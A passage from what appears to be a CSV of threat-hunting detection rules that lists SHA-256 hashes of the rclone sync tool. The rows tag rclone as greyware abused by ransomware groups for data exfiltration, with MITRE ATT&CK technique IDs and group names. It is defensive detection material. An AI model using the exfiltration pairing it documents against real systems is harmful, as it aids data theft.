Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4485d53cfd05d5c8845a2c8ab222a87a236ab23fee8c6362d20813e797af2b40*",".{0,1000}4485d53cfd05d5c8845a2c8ab222a87a236ab23fee8c6362d20813e797af2b40.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*44941b5b0c0c3b9dfed32117a7d72c488a20e60e404ba4840489371a6af990df*",".{0,1000}44941b5b0c0c3b9dfed32117a7d72c488a20e60e404ba4840489371a6af990df.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*449748dbd27c349146664fe691ea0f2cc57748de0e42d08126fe455d51275400*",".{0,1000}449748dbd27c349146664fe691ea0f2cc57748de0e42d08126fe455d51275400.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*44a6a2ef723f7c63941136f85f6a757ef9c5a0d7d455f75ad9ec5a58abd62bdb*",".{0,1000}44a6a2ef723f7c63941136f85f6a757ef9c5a0d7d455f75ad9ec5a58abd62bdb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*450aed08c24729159e19afe354aba83bd88f31606765d83c6a8c91a062e49246*",".{0,1000}450aed08c24729159e19afe354aba83bd88f31606765d83c6a8c91a062e49246.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*458413bdd7a85cb8a19a7f955e25ac633fe1513f956b6bc09efd5ca51d44aa8a*",".{0,1000}458413bdd7a85cb8a19a7f955e25ac633fe1513f956b6bc09efd5ca51d44aa8a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*45aa2b0be897c25e45040ae8b45c93882f3c15802ce8be0ab09c3a54b95df10c*",".{0,1000}45aa2b0be897c25e45040ae8b45c93882f3c15802ce8be0ab09c3a54b95df10c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*45d5b7799b90d8d6cc2d926d7920383a606842162e41303f5044058f5848892c*",".{0,1000}45d5b7799b90d8d6cc2d926d7920383a606842162e41303f5044058f5848892c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*45ec732d50b2517dc2c860317a3bf79867634a8143e4a441a3e399434ad6c141*",".{0,1000}45ec732d50b2517dc2c860317a3bf79867634a8143e4a441a3e399434ad6c141.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4615cb76b150bcc5934470afc6d899730cdc6c80be322d519874067f8370b3f9*",".{0,1000}4615cb76b150bcc5934470afc6d899730cdc6c80be322d519874067f8370b3f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*462f891bb87bcfa4551769f696db8bb39d168f2086951bccf0bd5d02e906aa8b*",".{0,1000}462f891bb87bcfa4551769f696db8bb39d168f2086951bccf0bd5d02e906aa8b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*46805de0bffb415983feda5b60fc36618b3aa8622517bba3e565362caf2d3a0d*",".{0,1000}46805de0bffb415983feda5b60fc36618b3aa8622517bba3e565362caf2d3a0d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*46843aa0bde60a8caf19de891d80c68c51d85f36334f46f0477282fec1c6eb8c*",".{0,1000}46843aa0bde60a8caf19de891d80c68c51d85f36334f46f0477282fec1c6eb8c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*46894d7590536bd8edf120a558ab6044327bf8b04456af3fd6780eed0a8aeb53*",".{0,1000}46894d7590536bd8edf120a558ab6044327bf8b04456af3fd6780eed0a8aeb53.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*468a7286eb3df5e54e711ed56796e0b5d2ffe1d237677d4318c26b5f20f265d2*",".{0,1000}468a7286eb3df5e54e711ed56796e0b5d2ffe1d237677d4318c26b5f20f265d2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*46a5d26f4dcb3d1e7d52cd2c26739782837d48dde9fb7a0255f9ccbfc1092e47*",".{0,1000}46a5d26f4dcb3d1e7d52cd2c26739782837d48dde9fb7a0255f9ccbfc1092e47.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*46cb2aec929225e1d9c943333a1e117660c11fc3d490397142cf7182faff8535*",".{0,1000}46cb2aec929225e1d9c943333a1e117660c11fc3d490397142cf7182faff8535.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*46d99596923f252752f41d0efef2e3f37b40cce80771202b1cedefa608dae3dc*",".{0,1000}46d99596923f252752f41d0efef2e3f37b40cce80771202b1cedefa608dae3dc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*47ebf0df8afd0a6c51d8f213169f8e9b214514f0f2a615188ffdf534f9c8968a*",".{0,1000}47ebf0df8afd0a6c51d8f213169f8e9b214514f0f2a615188ffdf534f9c8968a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*48103d949e2b72562259d42401462ba19589a2e31676396d4fb631325e12501b*",".{0,1000}48103d949e2b72562259d42401462ba19589a2e31676396d4fb631325e12501b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4811c2fc85e4397ae7670768608a717c044928138d1238e58bd28c038b7178ff*",".{0,1000}4811c2fc85e4397ae7670768608a717c044928138d1238e58bd28c038b7178ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*481e17864e25d9acaca14aefd04e0794d310b080474f34d8dad849fd64f4f8ac*",".{0,1000}481e17864e25d9acaca14aefd04e0794d310b080474f34d8dad849fd64f4f8ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*48282c20b9dc641bf52f79d0312bfb3c4d676ec1b084b4cf6d43ebbffa5d7041*",".{0,1000}48282c20b9dc641bf52f79d0312bfb3c4d676ec1b084b4cf6d43ebbffa5d7041.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*486bb5da7eacdbf2778cf31594f38ba458b4cc47076d7014e20e92dc4e74df6f*",".{0,1000}486bb5da7eacdbf2778cf31594f38ba458b4cc47076d7014e20e92dc4e74df6f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*48faaec738d9bba59f0451dba768acb7af36e25f01690accb1f057efcfe97af0*",".{0,1000}48faaec738d9bba59f0451dba768acb7af36e25f01690accb1f057efcfe97af0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*49191e1156cf0c41d9e6af35bd31cf2a2884107483823e17671323717905e771*",".{0,1000}49191e1156cf0c41d9e6af35bd31cf2a2884107483823e17671323717905e771.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*491d4081df6962b019e8f011c1b33bc09cbe8d53b9e12a7aba908518474b27bf*",".{0,1000}491d4081df6962b019e8f011c1b33bc09cbe8d53b9e12a7aba908518474b27bf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*49a78cb4a08364e9c56e6d5771f27a93c3dd70b633cc272b9ca35aaac4b89513*",".{0,1000}49a78cb4a08364e9c56e6d5771f27a93c3dd70b633cc272b9ca35aaac4b89513.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*49f65f132fc76bb1eeebe13b06b87de99018be5be3cc8873af778359d17756c3*",".{0,1000}49f65f132fc76bb1eeebe13b06b87de99018be5be3cc8873af778359d17756c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4a0b0a80a93836b02dea026b0c8277066e78ab1a73bba2793ee0ca11609846d1*",".{0,1000}4a0b0a80a93836b02dea026b0c8277066e78ab1a73bba2793ee0ca11609846d1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4a181ee46f5d2407b4993a051cd293457df643e6394048fbf70cef6b06c1c254*",".{0,1000}4a181ee46f5d2407b4993a051cd293457df643e6394048fbf70cef6b06c1c254.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4a1a3fdcfd575e328785cb4d09f88998fe2c3b1b0f07e77252ca28ca002be687*",".{0,1000}4a1a3fdcfd575e328785cb4d09f88998fe2c3b1b0f07e77252ca28ca002be687.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4a3173e22289cfa77a5bfbe2563b895f3ac736c902debc9b95a9c46d1d5eb658*",".{0,1000}4a3173e22289cfa77a5bfbe2563b895f3ac736c902debc9b95a9c46d1d5eb658.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4a3ee8b921c12d1184de02df355ad0b69fde2dd0c220bfe9af0610e4fa0b3e8b*",".{0,1000}4a3ee8b921c12d1184de02df355ad0b69fde2dd0c220bfe9af0610e4fa0b3e8b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4a505e5ba3cb162eaee14fe99e0340b1477d79f8b3ba9d9cf756847a5d8c6f47*",".{0,1000}4a505e5ba3cb162eaee14fe99e0340b1477d79f8b3ba9d9cf756847a5d8c6f47.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
